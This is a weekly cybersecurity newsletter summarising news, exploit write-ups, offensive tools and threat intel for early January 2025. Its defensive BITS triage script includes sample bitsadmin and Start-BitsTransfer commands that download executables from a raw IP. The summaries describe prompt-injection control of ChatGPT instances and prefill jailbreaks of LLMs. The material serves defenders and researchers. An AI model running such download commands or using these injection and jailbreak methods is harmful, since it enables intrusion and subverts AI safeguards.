Last Week in Security - 2025-01-13
We're Hiring!
Immediate Open Positions:
Maryland Applicants:
We have openings for a Cryptologic Computer Scientist, Cyber Operator Developer Analyst, Ethical Hacker, Information Assurance Specialist, Information Systems Security Officer, Jr. Offensive Cyber Operator, Red/Blue Team Engineer, Senior Web Application Penetration Tester, Systems Engineer, Data Scientist, HPC Software Engineer, Information Systems Security Engineer, Operations Research Analyst, Reverse Engineer, and Software Engineer.
Virginia Applicants:
Available opportunities: DevSecOps Engineer and Red Team Operator - Senior.
For more open positions visit: https://www.sixgen.io/careers
Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools, and exploits from the past week. This post covers 2025-01-06 to 2025-01-13.
News
Telegram Hands U.S. Authorities Data on Thousands of Users - Telegram provided data on over 2,200 users to U.S. authorities last year, a significant increase from previous years. The spike in data requests came after a crackdown on the company following the arrest of CEO Pavel Durov in France. The company fulfilled 900 requests affecting 2,253 users from the U.S. in 2024, revealing a surge in cooperation with authorities.
A Day in the Life of a Prolific Voice Phishing Crew - Scammers are using sophisticated techniques to conduct voice phishing attacks, with new details revealing how they abuse legitimate services from Apple and Google. The scams involve sending legitimate-looking messages to targets to gain their trust. Groups use specialized tools and methods to manage phishing calls, with a focus on targeting crypto holders and high net worth individuals. The scammers rely on deception and social engineering to trick victims into revealing sensitive information or access to their accounts, leading to financial losses and data breaches.
Ivanti Connect Secure VPN Targeted in New Zero-Day Exploitation - Ivanti Connect Secure VPN appliances were targeted in a new zero-day exploitation campaign by threat actors, leading to potential remote code execution and network compromise. Mandiant identified the exploitation of CVE-2025-0282 in mid-December 2024. Multiple compromised appliances showed deployment of malware families such as SPAWN, DRYHOOK, and PHASEJAM. The threat actors utilized various techniques to evade detection, persist across system upgrades, steal credentials, and tamper with logs on the compromised appliances. Mandiant suspects that UNC5337 and UNC5221, China-based espionage actors, are behind the campaign. Customers are urged to update their systems to version 22.7R2.5 and closely monitor for any signs of compromise using the Integrity Checker Tool provided by Ivanti.
Hackers Claim Massive Breach of Location Data Giant, Threaten to Leak Data - Hackers claim to have breached Gravy Analytics, a location data giant, and threaten to leak a massive amount of data, including customer lists and smartphone location data. The company sells this data to the U.S. government and other entities. This breach highlights the risks of collecting and storing bulk location data, with potential implications for privacy and security. It is seen as a major concern for privacy advocates and cybersecurity experts.
Researcher Turns Insecure License Plate Cameras Into Open Source Surveillance Tool - A security researcher found that many Motorola automated license plate reader surveillance cameras are live-streaming data and video to the open internet, allowing anyone to watch and scrape the information. Using a proof-of-concept tool, a privacy advocate developed a method to automatically scan the footage for license plates, tracking the movements of individuals in real time. The open-source project DeFlock has discovered hundreds of these cameras streaming sensitive data online, highlighting the privacy risks associated with the widespread adoption of ALPR technology. Motorola Solutions is working on a firmware update to address the security vulnerabilities identified by the researcher.
Zero-day exploits plague Ivanti Connect Secure appliances for second year running - Zero-day exploits are targeting Ivanti Connect Secure appliances for the second year in a row, with two critical vulnerabilities, one of which was already being exploited. The cybersecurity industry is urging organizations to take mitigation efforts seriously to address these vulnerabilities. Ivanti has released updates for Connect Secure, but Policy Secure and ZTA Gateways will not receive their upgrades until January 21, prompting advice to pull these appliances offline until patches are available. Mandiant and watchTowr are involved in investigations into the attacks, which have the hallmarks of an advanced persistent threat campaign.
US cyber watchdog says no indication breach at Treasury hit other federal agencies - The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has stated there is no indication that the recent breach at the U.S. Treasury Department has affected other federal agencies. The breach involved Chinese hackers compromising several Treasury computers through a vulnerability in the cybersecurity firm BeyondTrust's services. BeyondTrust acknowledged that a limited number of clients were impacted but did not provide further details. Reports suggest the hackers targeted the Treasury's Office of Foreign Assets Control, seeking information on potential sanctions against Chinese entities.
BeyondTrust Remote Support SaaS Service Security Investigation - BeyondTrust has provided details about their investigation into a security incident involving their Remote Support SaaS service. They confirmed that a limited number of clients were affected by the exploitation of a vulnerability, which allowed unauthorized access to customer environments.
White House unveils Cyber Trust Mark program for consumer devices - The White House has launched the "Cyber Trust Mark" program, aiming to enhance the cybersecurity of consumer devices like smart home gadgets. The program involves labeling devices that meet baseline security standards to help consumers make informed purchasing decisions. This initiative aligns with broader efforts to address the risks posed by insecure Internet of Things (IoT) devices. The program will involve collaboration between federal agencies, industry stakeholders, and cybersecurity experts to ensure effectiveness and adaptability to evolving threats.
Techniques and Write-ups
Argo Workflows - Uncovering the Hidden Misconfigurations - Misconfigured Argo Workflows instances have been identified as a potential security risk, allowing attackers to compromise Kubernetes clusters and gain unauthorized access. The blog post highlights the key reasons why Argo Workflows is an attractive target for attackers and provides a step-by-step explanation of how to exploit these misconfigurations. Organizations are advised to implement proper authentication methods and scope permissions to specific namespaces to defend against potential attacks on Argo Workflows. Exploiting vulnerabilities in Argo can lead to supply chain attacks and unauthorized access to sensitive information.
ADFS — Living in the Legacy of DRS - The article discusses the use of ADFS, despite Microsoft's efforts to move towards Entra ID. It explores ADFS internals related to OAuth2, Device Registration Services, Device Authentication, and Enterprise Primary Refresh Tokens. The article also delves into Azure Hybrid Join and Entra Connect Device Writeback as attack pathways. Additionally, it touches on crafting Golden JWT to manipulate permissions in ADFS. The post provides insights and practical information for cybersecurity professionals.
ksmbd vulnerability research - At Doyensec, research was conducted on the ksmbd vulnerability in the Linux kernel. The ksmbd component optimizes performance by splitting tasks between kernel and user space. Vulnerabilities were identified, including a use-after-free issue and a memory exhaustion problem, both accessible without authentication. The research highlights the importance of thorough testing and the potential for uncovering further bugs through improved fuzzing techniques.
CVE-2024-53141: an OOB Write Vulnerability in Netfilter Ipset - CVE-2024-53141 is an out-of-bounds write vulnerability in the Netfilter ipset utility, which is used to manage sets of IP addresses, networks, and ports. The vulnerability was exploited during kernelCTF, leading to potential security risks. The exploitation involves creating ip_set objects with specific attributes to trigger the vulnerability and gain control over the kernel heap. The exploit includes steps such as memory spraying, setting up the exploitation environment, and manipulating the OOB access to leak kernel heap information and perform arbitrary memory writes. Ultimately, the exploit aims to pivot from the vulnerability to a use-after-free (UAF) condition and gain control over the kernel's execution flow.
AI Domination: Remote Controlling ChatGPT ZombAI Instances - The article discusses the concept of remote controlling ChatGPT instances through prompt injection, turning them into "ZombAI" for a botnet. The author demonstrates how a compromised ChatGPT instance can be controlled remotely, with instructions being updated over time. Data exfiltration is also explored, with bypasses found to leak data through domains like Azure Blob Storage Logs. Recommendations for improving security in AI systems are provided, emphasizing the need for stronger defenses against prompt injection attacks and data exfiltration as AI adoption grows.
Backdooring Your Backdoors - Another $20 Domain, More Governments - The researchers at watchTowr have discovered a new method of gaining access to systems by exploiting abandoned backdoors within other backdoors using expired domains. They have hijacked over 4000 live backdoors, revealing compromised systems in various governments, universities, and other entities. The researchers are highlighting the importance of addressing abandoned and expired infrastructure as a vulnerability to prevent unauthorized access to thousands of systems. They are also working with The Shadowserver Foundation to sinkhole the domains used in their research to prevent further exploitation.
Phish-free PayPal Phishing - FortiGuard Labs recently identified a phishing attempt targeting PayPal users that is difficult to detect. The scam involves redirecting victims to a fake PayPal login page linked to a Microsoft365 test domain. Once victims log in, scammers can take control of their PayPal accounts. To protect against this type of attack, training employees to be cautious of unsolicited emails is important. Fortinet suggests creating a DLP rule to identify emails sent via distribution lists as an additional security measure.
WorstFit: Unveiling Hidden Transformers in Windows ANSI! - This latest research uncovers the WorstFit attack surface in Windows ANSI, exploiting character conversion features to achieve practical attacks like Path Traversal and Remote Code Execution. The researchers emphasize the need to transition to Wide Character APIs to enhance cybersecurity and reduce the risk of these types of attacks.
Make Bloodhound Cool Again: Migrating Custom Queries from Legacy BloodHound to BloodHound CE - The article discusses the process of migrating custom queries from the legacy version of BloodHound to the new BloodHound Community Edition (CE). The author outlines steps to download, transform, and upload custom queries to the new system using JSON formatting and scripting. By following these steps, users can take advantage of the improved features and performance of BloodHound CE while maintaining their customized searches.
Indecent Exposure: Your Secrets are Showing - This blog post by Black Hills Information Security tells a true story of discovering cryptographic secrets in commercial software, leading to password decryption and software compromise. The story involves examining a configuration file, finding encryption methods, and accessing private code to decrypt passwords. The post highlights the importance of not storing secrets in code and the need for better security practices in software development. It also suggests future work to improve tools for analyzing cryptographic libraries in software.
All-in one Windows IPC Internals - COM Overview - The blog post provides an overview of the COM (Component Object Model) technology in Windows, comparing it to the older DDE technology. COM allows for platform-independent, distributed, object-oriented communication between software components. It utilizes native function calls for faster performance and supports local and remote communications, offering more security, efficiency, and versatility than DDE. The post explains the structure of COM components, lifecycle management, and the use of interfaces and apartments. It also touches on error handling, registry integration, and practical examples of COM interfaces in C++.
Exploitation Walkthrough and Techniques - Ivanti Connect Secure RCE (CVE-2025-0282) - The blog post discusses the exploitation walkthrough and techniques used to exploit the Ivanti Connect Secure RCE vulnerability (CVE-2025-0282). The vulnerability involves a stack-based buffer overflow in code handling IF-T connections. The post details the process of finding and utilizing gadgets to gain control of the instruction pointer and achieve remote code execution. However, critical details and mechanisms for building a proof of concept are intentionally withheld.
Bypassing Windows Kernel Mitigations: Part 2 - CVE-2024-21338 - In Part 2 of the research on bypassing Windows Kernel Mitigations, the focus is on the analysis of the Local Privilege Escalation vulnerability CVE-2024-21338 in appid.sys. The vulnerability allows for an untrusted pointer dereference, leading to the introduction of three post-exploitation techniques to bypass kCFG. The first technique explored involves modifying the PreviousMode field in the KTHREAD structure to achieve kernel read/write primitives, leading to token swapping for elevated privileges. The research also delves into finding and utilizing specific kernel functions, such as ExpProfileDelete, to bypass kCFG and execute desired actions in the kernel.
Memory-related CVEs Exploited in kernelCTF - The blog post discusses two memory-related CVEs exploited in the kernelCTF environment, with a focus on race conditions and stack expansion vulnerabilities. The first CVE involves a race condition between remapping and memory advising system calls, while the second CVE deals with a use-after-free vulnerability during stack expansion. The post provides detailed analysis of the vulnerabilities, including code tracing and explanations of the exploit mechanisms. The vulnerabilities have already been reported by their authors, with recommendations to review the detailed reports for more information. Fixes for the vulnerabilities involve patch commits and changes to the code implementation to address the root causes.
Mastering Modern Red Teaming Infrastructure Part 3 — Securing Mail Services with DNS Records and OPSEC for Bypassing Mail Security Gateways - In this article, the author discusses the importance of securing mail services for red team operations by using DNS records such as SPF, DKIM, and DMARC, as well as implementing operational security measures. The guide walks through setting up Zoho Mail for a domain, adding MX, SPF, DKIM, and DMARC records on Cloudflare, and implementing OPSEC measures to bypass mail security gateways. Testing email security configuration and enhancing email credibility through signature collection techniques are also explained. Additionally, other OPSEC measures to bypass mail security gateways are discussed, such as avoiding suspicious keywords in emails and rotating domains and user accounts regularly. The setup described in the article enables the bypassing of mail security gateways effectively, giving an edge in executing phishing campaigns and other social engineering attacks.
Make Burp Suite your own: high-powered extensibility to customize and enhance your testing - Burp Suite offers high-powered extensibility that allows users to customize and enhance their testing experience. This includes features such as Bambdas, Custom Scan Checks (BChecks), and Extensions, which can be used to tailor workflows, automate detection of vulnerabilities, and extend functionality. Users can create their own Bambdas, BCheck checks, and extensions to meet their specific testing needs, or explore the growing library of community-created tools. Additionally, the Burp Suite Enterprise Edition offers advanced features for dynamic web vulnerability scanning and security testing.
Top 10 web hacking techniques of 2024: nominations open - Nominations for the top 10 web hacking techniques of 2024 are now open. Burp Suite offers various products for web security testing, including a vulnerability scanner and tools for penetration testing. Researchers can nominate innovative and reusable techniques that push the boundaries of web security, with community voting and a panel vote to select the finalists. Some of the nominated techniques include cache exploitation, timing attacks, and bypassing WAFs, showcasing the diversity and complexity of modern web hacking.
Do Secure-By-Design Pledges Come With Stickers? - Ivanti Connect Secure RCE (CVE-2025-0282) - In January 2025, Ivanti Connect Secure was found to have vulnerabilities similar to those seen in 2024, despite the company signing a Secure-By-Design pledge. A patch was made available earlier for some users, but others had to wait. The vulnerability, CVE-2025-0282, allowed for pre-authentication remote code execution. Through analysis, it was discovered that an attacker could exploit a stack-based buffer overflow by manipulating certain values in the system. Despite exploit mitigations in place, the severity of the vulnerability was highlighted, and the importance of proactive security measures was emphasized.
0x05 - Introduction to Windows Kernel Type Confusion Vulnerabilities - The article introduces the concept of Windows Kernel Type Confusion vulnerabilities and provides a high-level overview using a Dark Souls hypothetical. It explains that Type Confusion occurs when a program incorrectly assumes the type of an object or variable. The article then delves into a code example, showcasing how the vulnerability can be exploited in Windows 7 (x86) and Windows 11 (x64) kernels. It demonstrates how attackers can leverage type confusion vulnerabilities to achieve memory corruption or code execution by improperly casting variable types.
The (Almost) Forgotten Vulnerable Driver - Vulnerable Windows drivers are a commonly exploited method for attackers to gain access to the Windows kernel. One particular vulnerable driver, not blocked or included in the bad driver list, was found to have 9 vulnerabilities that could be exploited to gain various privileges. The author of the research was able to overwrite values in the LSASS process and even set their process's thread to run in kernel mode, demonstrating the potential dangers of forgotten drivers. However, newer Windows versions have additional protections in place to prevent such exploits.
Abusing AD-DACL: AddSelf - This article explores the exploitation of Discretionary Access Control Lists (DACL) in Active Directory environments by abusing the AddSelf permission. Attackers can escalate privileges by adding themselves to privileged groups like Domain Admins or Backup Operators, allowing them to gain administrative control, move laterally within the network, access sensitive systems, and maintain persistence. The post outlines lab setups, methods for exploitation, tools like Bloodhound and Impacket, and detection mechanisms for identifying and mitigating AddSelf attacks to equip security professionals with critical insights to defend against these threats.
Comprehensive Guide to Booting, Bootloaders, and related Attack Vectors and Security — Part 1 - Bootloaders are essential components of the modern computer system as they bridge the gap between hardware and the operating system. They play a crucial role in initializing hardware components and loading the operating system into memory. Bootloaders like GRUB and Windows Boot Manager allow users to choose between multiple operating systems at startup and enforce cryptographic verification of the kernel and OS images to ensure the system boots trusted code. In this comprehensive guide, we explore the importance of bootloaders, their development, and their vulnerabilities to attacks, as well as how Secure Boot and multibooting work to secure the boot process and protect against malicious threats like bootkits, rootkits, and ransomware attacks. Additionally, we discuss advanced threats like APT groups that exploit vulnerabilities in the boot process, providing practical examples of MBR rootkit injection and GPT hijacking.
Exploring Recent CVEs in HPE Insight Remote Support - The blog post explores two critical vulnerabilities, CVE-2024-53675 (unauthenticated XXE vulnerability) and CVE-2024-53676 (Remote Code Execution vulnerability), in the HPE Insight Remote Support application. The XXE vulnerability allows remote attackers to access sensitive information, while the RCE vulnerability allows them to execute arbitrary code on affected installations without authentication. The post provides a deep dive into the exploitation of these vulnerabilities, with a focus on understanding the vulnerabilities and proof of concept examples. Despite some setup issues preventing full RCE exploitation, the post provides insights on the technical aspects of the vulnerabilities and their exploitation.
Two Network-related Vulnerabilities Analysis - This blog post introduces two network-related vulnerabilities in the Linux kernel, focusing on IP Packet and IGMP Protocol vulnerabilities. The IP Packet vulnerability involves potential issues with transmitting data through a raw socket, while the IGMP Protocol vulnerability highlights concerns with handling multicast group memberships. The post also discusses socket creation, listening, accepting, TCP receive, and Upper Layer Protocol (ULP) functions, and provides insights into the root causes of these vulnerabilities and suggested fixes.
Compromising healthcare – from SQL injection to domain admin - The article discusses the technical details of compromising a healthcare organization's domain through exploiting an error-based SQL injection in a vulnerable web application. The process involved obtaining domain admin privileges by creating workflows to bypass security measures, changing passwords, gaining access to the internal network, and ultimately compromising patient records and medical devices. The attackers demonstrated how they were able to escalate their privileges step by step, highlighting the importance of cybersecurity measures in protecting sensitive healthcare data.
Capturing the Flags of the Internet: Find 0-days in OSS and write scanners to detect them - This blog discusses the concept of finding zero-days in open-source software (OSS) and creating scanners to detect them. Zero-days refer to vulnerabilities in software that are not yet known to the vendor or the public. The blog provides insights into the process of discovering these vulnerabilities, creating scanners to detect them, and ultimately improving the security of OSS.
IrisCTF 2025 - webwebhookhook - The post discusses the author's experience with the IrisCTF 2025 challenge called webwebhookhook, which was written in Kotlin, a language built on Java. The challenge involved manipulating URLs and DNS records to send a flag to a specific endpoint. The author used a custom DNS server to alternate IP addresses and successfully triggered the server to send the flag to their VPS. Ultimately, the challenge was solved by exploiting a cache expiration timing issue.
CVE-2024-54527: MediaLibraryService Full TCC Bypass, Dive Deep into AMFI - The blog post explores a vulnerability (CVE-2024-54527) in the MediaLibraryService that allows for a full TCC bypass, diving deep into the AMFI (Apple Mobile File Integrity). The vulnerability exists in the XPC service, which grants powerful entitlements to modify the daemon process. The post delves into the technical details of the bypass, explaining how an attacker can inject into the vulnerable XPC service using a malicious plugin. It also discusses improvements in Apple's security measures, such as Library Validation, and highlights a mitigation introduced in macOS 14.0 to prevent such exploits. Additionally, it mentions a patch in macOS 15.2 to address the vulnerability.
Using SYN Port Scans with Source IP Spoofing For Offensive Deception - The blog discusses the use of SYN port scans with source IP spoofing as an offensive deception technique in penetration testing and security operations. Attackers can use this tactic to divert security teams' attention and create false leads during network enumeration. The blog also covers various offensive deception techniques, such as planting false evidence and setting up honey traps for defenders.
Exploiting SSTI in a Modern Spring Boot Application (3.3.4) - The article discusses how an unauthenticated Remote Code Execution (RCE) was achieved through Server-Side Template Injection (SSTI) in a modern Spring Boot application using Thymeleaf templating engine. The exploit involves bypassing defenses in newer versions of Spring Boot and finding a novel bypass to run arbitrary functions using reflection. The exploit allows for running commands without an external channel, but there may be easier ways to achieve the final result. Additionally, there are tutorials on exploiting vulnerabilities in OpenVPN and email addresses for offensive purposes.
First tokens: The Achilles’ heel of LLMs - This article discusses the potential security risks associated with Assistant Prefill, a feature offered by many large language model (LLM) providers. Prefilling a model's response can create vulnerabilities that allow for safety alignment bypasses or "jailbreaking". The article includes experiments with live and local models to demonstrate how prefill techniques can manipulate responses and automate attacks. Recommendations are made to disable or restrict Assistant Prefill support to mitigate these risks until more robust safeguards can be developed by LLM vendors.
Bypassing File Upload Restrictions To Exploit Client-Side Path Traversal - Doyensec researchers analyzed a vulnerability chain in which bypassing file upload restrictions enables Client-Side Path Traversal (CSPT). The issue arises from inadequate validation during file uploads, which allows attackers to bypass security controls and upload malicious files. This flaw can lead to unauthorized code execution, data breaches, and privilege escalation. The blog details the exploitation techniques, mitigation strategies, and best practices to secure file upload features.
Hijacking Azure Machine Learning Notebooks (via Storage Accounts) - NetSPI researchers detailed techniques for hijacking Azure Machine Learning Notebooks, exploiting misconfigurations and insufficient access controls in cloud environments. Attackers can leverage these weaknesses to gain unauthorized access, execute malicious code, and exfiltrate sensitive data stored in notebooks. The blog outlines specific attack scenarios, such as exploiting overly permissive identity roles and improperly secured endpoints, to demonstrate how attackers could escalate privileges or compromise entire systems.
Time Hacking: Pause, Analyze, Exploit - Red Siege's blog explores the concept of "time hacking," where attackers manipulate or exploit time-based mechanisms in systems for malicious purposes. This includes exploiting timestamp-dependent authentication, job scheduling, or session expiration controls to bypass security measures.
Tools and Exploits
RustAutoRecon - This project is a high-performance implementation of AutoRecon in Rust, a multi-threaded network reconnaissance tool that automates the enumeration of services. It is designed for speed, stability, and efficient resource usage, with features such as adaptive rate limiting, service version detection, and custom protocol probing. The tool is up to 300% faster than the Python implementation, with minimal system resource usage and support for IPv4 and IPv6.
dylight - The GitHub project "Dylight" is a macOS dylib stager that loads dynamic libraries from the internet over HTTP and injects them into the local process.
VladimiRED - VladimiRED is a C# port of the Mockingjay injection technique used with the AppDomainManager Injection Method. It injects shellcode into existing RWX regions via Marshaling. A 64-bit AppDomainManager Microsoft-signed application is needed to run it. The project requires other "vulnerable" DLL files and a shellcode encryption/download method to evade EDRs. The technique takes advantage of RWX sections in DLLs to allocate and execute code.
sharp-execute - The GitHub repository "sharp-execute" contains code for executing .NET applications from an unmanaged process by manually loading the CLR. The tool offers two approaches to evade detection by either hooking and thread-pooling functions using hardware breakpoints or patching the target function via an Asynchronous Procedure Call (APC).
Userland Exec - The GitHub repository "hardenedlinux/userland-exec" contains a Proof of Concept (PoC) for a userland exec technique that can be used as an attack vector. Userland exec replaces the existing process image with a new one while retaining the old process name for stealth. The technique can be used to execute arbitrary code and bypass SELinux verification by creating a temporary file. The repository was inspired by the Rapid7 Mettle library and has been extended to include additional complexity.
MLOKit - MLOKit is a toolkit designed to attack MLOps platforms using REST APIs by specifying attack modules and valid credentials for the platform. It supports modules for reconnaissance, data extraction, and model extraction, with the ability to add new modules in the future. Users can check credentials, list projects, models, and training datasets, and download models and datasets with the tool. There are specific authentication methods for supported MLOps platforms like Azure ML and Vertex AI, with detailed instructions provided.
LNK Smuggler - LNKSmuggler is a Python script that creates shortcut files with embedded encoded data and packages them into ZIP archives. The resulting LNK file extracts and executes the embedded files, bypassing MOTW and the need to download files over the Internet. This project is designed to automate the creation of ZIP files for use in phishing campaigns. Users can clone the repository, install necessary libraries, and run the script to create and execute the LNK files.
Scoop the (Paged) Pool Template - The GitHub repository "Scoop the Pool Template" provides an example of an exploitation technique called Scoop the Pool, which is applicable to Windows pool overflow vulnerabilities. The technique creates an arbitrary read primitive and an arbitrary decrement from a paged pool overflow, allowing the manipulation of kernel memory. The template includes a payload to elevate privileges and spawn cmd.exe as NT AUTHORITY\SYSTEM.
EmbedInHTML (python3) - The GitHub repository redteamronin/EmbedInHTML offers a tool that encrypts and embeds files into HTML files for automatic downloading when a user browses the HTML file. Users can generate the output HTML file with the tool, which embeds the decryption key within the file.
Rusty-PE-Packer - The project on GitHub is called Rusty PE Packer, which is a Windows executable packer written in Rust for x64 systems. It includes features such as anti-debug and anti-analysis techniques, VEH abuse for confusing execution flow, and ROP gadget for decrypting packed stub.
EarlyCascade - The repository 0xNinjaCyclone/EarlyCascade on GitHub contains a proof-of-concept for the Early Cascade process injection technique. The technique injects and executes code in the early stages of process creation, before EDR user-mode detection hooks are loaded. The PoC demonstrates creating a process in suspended mode, dynamically locating addresses, remotely allocating memory, injecting code into the target process, and hijacking a shim engine callback to disrupt detection measures and perform stealthy injection.
Local Privilege Escalation in IObit Malware Fighter - This GitHub repository contains a proof-of-concept program for exploiting a local privilege escalation vulnerability in IObit Malware Fighter. The program abuses the IMFForceDelete driver to gain the ability to make arbitrary changes to the system as NT AUTHORITY\SYSTEM. Exploitation abuses the MSI rollback mechanism together with weak DACL, RBF, and RBS files.
NtCreateLowBoxToken - This GitHub repository contains a fully compatible replacement of the Windows NT NtCreateLowBoxToken syscall, meticulously restored through reverse engineering. The implementation ensures binary compatibility and emphasizes security token manipulation and process isolation mechanisms. It includes a kernel-mode driver for system call interception and supports AppContainer security context creation.
CVE-2024-54498 PoC - SharedFileList_escape - This GitHub repository contains a proof-of-concept exploit for CVE-2024-54498, which allows for escaping the macOS sandbox using the sharedfilelistd exploit.
APEX (Azure Post Exploitation Framework) - The APEX (Azure Post Exploitation Framework) is a tool built on modular architecture that aims to simplify post exploitation tasks in Azure-related accounts. It combines Microsoft Graph PowerShell Module, Azure CLI, and Az PowerShell Module for accessing and querying Azure resources. APEX has pre-built queries and attacks to speed up processes and ensure important checks are not forgotten.
Parsler - Parsler is a tool that simplifies Snaffler's output by organizing raw logs into a searchable, filterable, and navigable format with visualizations. It streamlines the review process for identifying files and potential risks by organizing the data into a more manageable format. Users can analyze the output through structured pages that include tabular views, hierarchical representations of findings, visual analytics, and file age trends. The tool is useful for identifying and mitigating risks such as files containing sensitive information or keys that could lead to unauthorized access.
Threat Intel and Defense
EAGERBEE, with updated and novel components, targets the Middle East - The EAGERBEE backdoor, targeting the Middle East, has been found to include new components and plugins used in attacks on ISPs and governmental entities in the region. The backdoor injects itself into a running service process, allowing for malicious activities like deploying payloads, exploring file systems, and executing commands. Additionally, there are potential connections between the EAGERBEE backdoor and the CoughingDown threat actor group. The initial infection vector remains unclear, but organizations in East Asia were breached using the ProxyLogon vulnerability to execute malicious activities.
Bug Bounty Spam -Beg Bounties- (and other scams): Part I - The authors have encountered bug bounty spam and other scams, including fake bug bounty reports and phishing attempts. Subreption has also analyzed instances of spam with malicious intent, such as distress tactics and targeted harassment, as well as spam targeting vendors with coercive demands for monetary rewards. The company has identified common psychological manipulation tactics used in these scams and emphasizes the importance of reporting such incidents to prevent potential security breaches.
Bug Bounty Spam (and other scams): Part II - Subreption has recently encountered bug bounty spam and other apparent scams and details its interactions with the would-be scammers in a blog post. Posing as security researchers, they attempted to elicit rewards for reporting supposed security issues but were exposed through forensic analysis and tracking. Subreption advises caution when dealing with such requests and emphasizes verifying the identity and reputation of the reporter.
Autopsy Hardening Guide: Part 1 - This blog post discusses part one of a series on hardening an Autopsy Multi-user Cluster, emphasizing the importance of network security and additional steps that can be taken to make the cluster more secure. It includes instructions on setting up a multi-user cluster and securing Solr by creating a username and password for the admin panel. The post also mentions updates to PostgreSQL configuration and upcoming topics to be covered in the next post.
Part 15: Function Type Categories - In the "On Detection: Tactical to Functional" blog series, Part 15 focuses on categorizing function types into seven different categories: Standard Functions, Sub-operations, Remote Procedure Calls, Local Security Authority Functions, Driver IOCTLs, Compound Functions, and Local Functions. Each category is explained and demonstrated with examples, tool graphs, and function call stacks. By understanding these categories, analysts can better categorize and identify the capabilities of attacker tools or malware samples they encounter. The article provides a detailed analysis of each category and how they relate to modern tradecraft in the realm of cybersecurity.
A BITS of a Problem - Investigating BITS Jobs - BITS jobs, transfers scheduled through Microsoft's Background Intelligent Transfer Service, can be abused by threat actors to download and execute malware. The jobs persist even after the parent application exits, which makes them attractive for staging and persistence. BITS abuse can be investigated through artifacts such as Windows event logs, PowerShell, and Sysmon logs. Security teams should monitor for suspicious behavior and have visibility into process execution and command-line auditing to detect and investigate malicious BITS usage.
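As an added illustration of the kind of triage the article describes (this is example code written for this summary, not from the article), the following Python runs a few BITS-related checks over constructed, normalised event records: Sysmon process creation for bitsadmin.exe, Microsoft-Windows-Bits-Client transfer-start records (event ID 59, which carries the job name and URL), and a PowerShell script block calling Start-BitsTransfer. The event shapes, the allowlist of update hosts and the severities are assumptions to be tuned for your own telemetry.

```python
import re
from urllib.parse import urlparse

# Constructed sample events (not real telemetry), normalised to dicts the way a
# SIEM pipeline would hand them over: two Sysmon process-creation records,
# two Microsoft-Windows-Bits-Client records and one PowerShell script block.
SAMPLE_EVENTS = [
    {"source": "Sysmon", "id": 1, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer upd /download /priority high http://203.0.113.10/u.exe C:\Users\Public\u.exe"},
    {"source": "Sysmon", "id": 1, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /setnotifycmdline upd C:\Users\Public\u.exe NULL"},
    {"source": "Bits-Client", "id": 59, "job": "upd", "url": "http://203.0.113.10/u.exe",
     "owner": r"CORP\jdoe"},
    {"source": "Bits-Client", "id": 59, "job": "WU", "url": "https://download.windowsupdate.com/x.cab",
     "owner": r"NT AUTHORITY\SYSTEM"},
    {"source": "PowerShell", "id": 4104,
     "script": r"Start-BitsTransfer -Source http://203.0.113.10/a.ps1 -Destination $env:TEMP\a.ps1"},
]

# Assumed allowlist of first-party download hosts; tune it to your environment.
ALLOWED_HOSTS = {"download.windowsupdate.com", "update.microsoft.com"}
# Paths an unprivileged user can write to; a download landing here is suspicious.
USER_WRITABLE = re.compile(r"^(c:\\users\\|c:\\programdata\\|c:\\windows\\temp\\)", re.I)
EXEC_EXT = (".exe", ".dll", ".ps1", ".bat", ".vbs", ".js", ".hta")


def is_ip(host):
    """True when the URL host is a bare IPv4 literal rather than a name."""
    return re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host or "") is not None


def triage_event(ev):
    """Return a list of (severity, reason) tuples for one normalised event."""
    hits = []
    if ev["source"] == "Sysmon" and ev["id"] == 1 and "bitsadmin" in ev["image"].lower():
        cmd = ev["cmdline"].lower()
        if "/setnotifycmdline" in cmd:
            # The notify command runs when the job completes: execution + persistence.
            hits.append(("high", "bitsadmin notify command: payload executes on job completion"))
        if "/download" in cmd or "/transfer" in cmd:
            dst = ev["cmdline"].split()[-1]  # last argument is the local destination
            if USER_WRITABLE.match(dst) and dst.lower().endswith(EXEC_EXT):
                hits.append(("high", f"bitsadmin download of executable to user-writable path: {dst}"))
    if ev["source"] == "Bits-Client" and ev["id"] == 59:
        host = urlparse(ev["url"]).hostname
        if is_ip(host):
            hits.append(("medium", f"BITS job '{ev['job']}' fetching from raw IP {host}"))
        elif host not in ALLOWED_HOSTS:
            hits.append(("low", f"BITS job '{ev['job']}' fetching from non-allowlisted host {host}"))
    if ev["source"] == "PowerShell" and "start-bitstransfer" in ev.get("script", "").lower():
        hits.append(("medium", "Start-BitsTransfer in script block; review source and destination"))
    return hits


def triage(events):
    """Flatten findings across a batch: (event index, severity, reason)."""
    return [(i, sev, why) for i, ev in enumerate(events) for sev, why in triage_event(ev)]


if __name__ == "__main__":
    for idx, sev, why in triage(SAMPLE_EVENTS):
        print(f"[{sev}] event {idx}: {why}")
```

The allowlist check is deliberately the lowest severity: legitimate software updaters use BITS constantly, so correlating the job owner, the destination path and a notify command is what separates abuse from noise.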
Gayfemboy: A Botnet Deliver Through a Four-Faith Industrial Router 0-day Exploit. - Gayfemboy is a botnet that was first discovered by XLab in early February 2024 and has evolved significantly since then. It was found to be exploiting a 0-day vulnerability in Four-Faith industrial routers to spread its payloads, and it has more than 15,000 daily active nodes. The botnet uses various vulnerabilities and weak credentials to infect devices globally and launch DDoS attacks. The operators of Gayfemboy have retaliated against researchers trying to observe their activities, demonstrating a high level of hostility.
FunkSec – Alleged Top Ransomware Group Powered by AI - FunkSec is an emerging ransomware group that uses AI-assisted malware development and has published over 85 claimed victims, surpassing other ransomware groups. Their activities straddle the line between hacktivism and cybercrime, raising questions about their true motivations. The group's leaked datasets are often recycled from previous hacktivism campaigns, casting doubt on their authenticity and highlighting the need for more objective evaluation techniques in assessing ransomware group threats. FunkSec offers a range of tools, including a custom-developed DDoS tool and ransomware, and their operations are widely discussed in cybercrime forums.
Malicious NPM packages target marked-js library - Malicious npm packages named marked-ps and marked-cs were found posing as versions of the legitimate marked library. Both deploy malware; marked-cs was the more popular of the two and drops a file called marked.exe as its payload. Source code and package scanning tools have difficulty detecting these packages, and Indicators of Compromise (IOCs) have been published, highlighting the need for vigilance when installing npm packages.
